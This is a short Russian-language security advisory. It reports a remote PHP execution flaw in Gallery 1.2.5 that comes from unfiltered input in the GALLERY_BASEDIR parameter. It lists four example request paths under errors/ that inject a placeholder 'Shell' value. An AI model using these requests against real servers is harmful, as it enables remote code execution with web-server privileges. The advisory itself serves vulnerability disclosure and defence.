Программа: Gallery 1.2.5
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «GALLERY_BASEDIR» различными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Примеры:
[Path]/errors/needinit.php?GALLERY_BASEDIR=Shell
[Path]/errors/reconfigure.php?GALLERY_BASEDIR=Shell
[Path]/errors/unconfigured.php?GALLERY_BASEDIR=Shell
[Path]/errors/configmode.php?GALLERY_BASEDIR=Shell
